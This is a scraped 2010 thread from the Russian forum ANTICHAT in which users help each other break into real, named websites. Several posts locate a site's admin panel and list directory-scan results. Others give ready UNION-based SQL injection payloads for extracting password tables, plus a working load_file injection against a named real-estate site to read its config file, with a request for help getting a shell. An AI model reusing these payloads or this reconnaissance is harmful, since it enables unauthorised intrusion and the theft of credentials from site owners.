ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.07.2010, 15:30
|
|
Новичок
Регистрация: 04.12.2005
Сообщений: 6
Провел на форуме:
27773
Репутация:
1
|
|
|
|
|
09.07.2010, 20:14
|
|
Постоянный
Регистрация: 27.09.2008
Сообщений: 469
Провел на форуме:
784549
Репутация:
309
|
|
спаасибо за ответ.
|
|
|
|
09.07.2010, 21:06
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
помогите найти админку...http://www.nll.com/
|
|
|
|
09.07.2010, 21:13
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Сообщение от None
помогите найти админку...http://www.nll.com/
Вот: http://www.nll.com/admin.inc. Но там 403.
З.Ы. Видел уже не один твой подобный пост. Скачай себе сканер директорий сайта и им же ищи админку.
|
|
|
|
09.07.2010, 21:48
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от jecka3000
jecka3000 said:
помогите найти админку...http://www.nll.com/
Попробуй выбрать из этого:
Сообщение от None
» http://www.nll.com/.htaccess HTTP 403 Forbidden
» http://www.nll.com/.htconfig HTTP 403 Forbidden
» http://www.nll.com/.htpasswd HTTP 403 Forbidden
» http://www.nll.com/header.php HTTP 200 OK
» http://www.nll.com/footer.php HTTP 200 OK
» http://www.nll.com/cgi-bin/ HTTP 403 Forbidden
» http://www.nll.com/cache/ HTTP 200 OK
» http://www.nll.com/chat/ HTTP 200 OK
» http://www.nll.com/logos/ HTTP 401 Authorization Required
» http://www.nll.com/stats/ HTTP 403 Forbidden
» http://www.nll.com/config.php.inc HTTP 403 Forbidden
» http://www.nll.com/config.inc HTTP 403 Forbidden
» http://www.nll.com/uploads/ HTTP 200 OK
» http://www.nll.com/~root HTTP 403 Forbidden
» http://www.nll.com/admin.inc HTTP 403 Forbidden
» http://www.nll.com/community/ HTTP 200 OK
» http://www.nll.com/config.inc HTTP 403 Forbidden
» http://www.nll.com/database.inc HTTP 403 Forbidden
» http://www.nll.com/db.inc HTTP 403 Forbidden
» http://www.nll.com/extension.inc HTTP 403 Forbidden
» http://www.nll.com/favicon.ico HTTP 200 OK
» http://www.nll.com/function.inc HTTP 403 Forbidden
» http://www.nll.com/horde/ HTTP 302 Found
» http://www.nll.com/icons/ HTTP 200 OK
» http://www.nll.com/index.php HTTP 200 OK
» http://www.nll.com/mobile/ HTTP 200 OK
» http://www.nll.com/users.inc HTTP 403 Forbidden
» http://www.nll.com/webmail/ HTTP 200 OK
|
|
|
|
10.07.2010, 12:25
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме:
136979
Репутация:
53
|
|
Decoy
хм... пробуй такой запрос site.com/fail.php?id=-1+union+select
+GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NA ME)+SEPARATOR+0x3C62723E)+from+information_schema. columns+where+column_name+like+0x257061737325+or+c olumn_name+like+0x25702577256425--+
Далее из полученных таблиц выводи имена колонок:
site.com/fail.php?id=-1+union+select
+GROUP_CONCAT(column_name)+SEPARATOR+0x3C62723E)+f rom+information_schema.columns+where+table_name=з ахексенное.имя.таблицы--+
получаешь имена колонок, и:
site.com/fail.php?id=-1+union+select
+concat_ws(0x3a,имена необходимых колонок)+from+iимя.таблицы--+ (если не будет вывода через точку имя_базы.имя_таблицы)
ЗЫ: +(пробел) перед коментариями не нужен) =) всего)
|
|
|
|
10.07.2010, 13:17
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441
Репутация:
0
|
|
Добрый день!
С помощью этого сайта можно загрузить config.php, но он не показывает все файлы содержат.
Есть ли у нас какой-либо способ для просмотра полного файл или заполнить оболочку?
http://www.siremax.com.mx/remaxnatura/propiedad-detalle.php?tipo=casas&id=9844 and 1=0 UNION SELECT 1,2,load_file(0x2F7661722F7777772F68746D6C2F72656D 61782F72656D61786D756C74697573752F7070686C6F676765 722F636F6E6669672E696E632E706870),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,6 1,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77, 78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94 ,95,96,97,98,99,100,101,102,103,104,105,106,107,10 8,109,110,111,112,113--
|
|
|
|
10.07.2010, 15:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
2538
Репутация:
0
|
|
Сообщение от haito
haito said:
Добрый день!
С помощью этого сайта можно загрузить config.php, но он не показывает все файлы содержат.
Есть ли у нас какой-либо способ для просмотра полного файл или заполнить оболочку?
http://www.siremax.com.mx/remaxnatura/propiedad-detalle.php?tipo=casas&id=9844 and 1=0 UNION SELECT 1,2,load_file(0x2F7661722F7777772F68746D6C2F72656D 61782F72656D61786D756C74697573752F7070686C6F676765 722F636F6E6669672E696E632E706870),4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,6 1,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77, 78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94 ,95,96,97,98,99,100,101,102,103,104,105,106,107,10 8,109,110,111,112,113--
Можно смотреть через исходник. Либо использевать sipt4, им на много удобнее.
|
|
|
|
10.07.2010, 16:24
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
Провел на форуме:
20441
Репутация:
0
|
|
Сообщение от $r00tkit$
$r00tkit$ said:
Можно смотреть через исходник. Либо использевать sipt4, им на много удобнее.
исходный код показать предела информации, посмотрите как некоторые функции вырезать. мы можем читать (load_file) построчно?
". '('.mysql_errno().') '.mysql_error().'
'. "Please check your settings in config.inc.php !
"); mysql_select_db(PPHL_DB_NAME) or die("Please first create your database '".PPHL_DB_NAME."' and make sure your user got the correct access rights on it !"); ; define('__GOT_MYSQL__', 1); } ?>
|
|
|
|
10.07.2010, 17:45
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от haito
haito said:
исходный код показать предела информации, посмотрите как некоторые функции вырезать. мы можем читать (load_file) построчно?
". '('.mysql_errno().') '.mysql_error().'
'. "Please check your settings in config.inc.php !
"); mysql_select_db(PPHL_DB_NAME) or die("Please first create your database '".PPHL_DB_NAME."' and make sure your user got the correct access rights on it !"); ; define('__GOT_MYSQL__', 1); } ?>
Нажми Ctrl+U на клавиатуре и посмотри.
Press Ctrl+U on your keyboard and see
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
